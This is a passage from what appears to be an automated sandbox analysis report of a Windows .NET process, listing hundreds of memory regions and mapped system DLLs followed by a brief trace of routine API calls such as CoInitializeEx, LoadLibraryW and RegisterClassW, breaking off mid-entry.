"private_0x000000007fe50000" filename = "" Region: id = 388 start_va = 0x810000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 389 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 390 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 391 start_va = 0x4650000 end_va = 0x465ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 392 start_va = 0x4690000 end_va = 0x469ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 393 start_va = 0x4660000 end_va = 0x466ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 394 start_va = 0x10000000 end_va = 0x10009fff monitored = 1 entry_point = 0x10004636 region_type = mapped_file name = "system.runtime.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Runtime\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Runtime.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.runtime\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\system.runtime.dll") Region: id = 395 start_va = 0x810000 end_va = 0x819fff monitored = 1 entry_point = 0x814636 region_type = mapped_file name = "system.runtime.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Runtime\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Runtime.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.runtime\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\system.runtime.dll") Region: id = 396 start_va = 0x4650000 end_va = 0x466ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 397 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 398 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 399 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 400 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 401 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 402 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 403 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 404 start_va = 0x6d300000 end_va = 0x6d30cfff monitored = 0 entry_point = 0x6d3063e0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\SysWOW64\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll") Region: id = 405 start_va = 0x684d0000 end_va = 0x68be1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll") Region: id = 406 start_va = 0x4650000 end_va = 0x468ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004650000" filename = "" Region: id = 407 start_va = 0x4740000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004740000" filename = "" Region: id = 408 start_va = 0x47e0000 end_va = 0x47effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047e0000" filename = "" Region: id = 409 start_va = 0x48b0000 end_va = 0x49affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 410 start_va = 0x4a30000 end_va = 0x4a3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a30000" filename = "" Region: id = 411 start_va = 0x4a40000 end_va = 0x4b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 412 start_va = 0x4780000 end_va = 0x479ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 413 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 414 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 415 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 416 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 417 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 418 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 419 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 420 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 421 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 422 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 423 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 424 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 425 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 426 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 427 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 428 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 429 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 430 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 431 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 432 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 433 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 434 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 435 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 436 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 437 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 438 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 439 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 440 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 441 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 442 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 443 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 444 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 445 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 446 start_va = 0x4780000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 447 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 448 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 449 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 450 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 451 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 452 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 453 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 454 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 455 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 456 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 457 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 458 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 459 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 460 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 461 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 462 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 463 start_va = 0x4780000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 464 start_va = 0x4780000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 465 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 466 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 467 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 468 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 469 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 470 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 471 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 472 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 473 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 474 start_va = 0x4780000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 475 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 476 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 477 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 478 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 479 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 480 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 481 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 482 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 483 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 484 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 485 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 486 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 487 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 488 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 489 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 490 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 491 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 492 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 493 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 494 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 495 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 496 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 497 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 498 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 499 start_va = 0x4780000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 500 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 501 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 502 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 503 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 504 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 505 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 506 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 507 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 508 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 509 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 510 start_va = 0x4780000 end_va = 0x478ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 511 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 512 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 513 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 514 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 515 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 516 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 517 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 518 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 519 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 520 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 521 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 522 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 523 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 524 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 525 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 526 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 527 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 528 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 529 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 530 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 531 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 532 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 533 start_va = 0x4780000 end_va = 0x4798fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004780000" filename = "" Region: id = 534 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 535 start_va = 0x49b0000 end_va = 0x4a11fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 536 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 537 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 538 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 539 start_va = 0x47a0000 end_va = 0x47b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047a0000" filename = "" Region: id = 540 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 541 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 542 start_va = 0x74920000 end_va = 0x74925fff monitored = 0 entry_point = 0x74921460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 543 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 544 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 545 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 546 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 547 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 548 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 549 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 550 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 551 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 552 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 553 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 554 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 555 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 556 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 557 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 558 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 559 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 560 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 561 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 562 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 604 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 605 start_va = 0x47c0000 end_va = 0x47cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 606 start_va = 0x21f0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 607 start_va = 0x21f0000 end_va = 0x21f2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021f0000" filename = "" Region: id = 608 start_va = 0x47d0000 end_va = 0x47dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047d0000" filename = "" Region: id = 609 start_va = 0x4a20000 end_va = 0x4a2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 610 start_va = 0x4b40000 end_va = 0x4b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 611 start_va = 0x4b50000 end_va = 0x4b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Thread: id = 1 os_tid = 0xd30 [0134.988] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0136.870] RoInitialize () returned 0x1 [0136.871] RoUninitialize () returned 0x0 [0149.814] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1d9 [0149.815] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc1d8 [0151.711] GetCurrentProcess () returned 0xffffffff [0151.713] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f048 | out: TokenHandle=0x19f048*=0x290) returned 1 [0152.021] GetCurrentProcess () returned 0xffffffff [0152.021] GetCurrentThread () returned 0xfffffffe [0152.021] GetCurrentProcess () returned 0xffffffff [0152.021] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19f0a4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19f0a4*=0x298) returned 1 [0152.028] GetCurrentThreadId () returned 0xd30 [0152.031] GetSystemMetrics (nIndex=75) returned 1 [0152.221] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0153.549] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6c7b0000 [0153.617] GetModuleHandleW (lpModuleName="user32.dll") returned 0x755c0000 [0153.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x19eecc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWÞhùa¥", lpUsedDefaultChar=0x0) returned 14 [0153.618] GetProcAddress (hModule=0x755c0000, lpProcName="DefWindowProcW") returned 0x73dc07e0 [0153.619] GetStockObject (i=5) returned 0x1900015 [0153.647] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0153.653] CoTaskMemAlloc (cb=0x5c) returned 0x895668 [0153.653] RegisterClassW 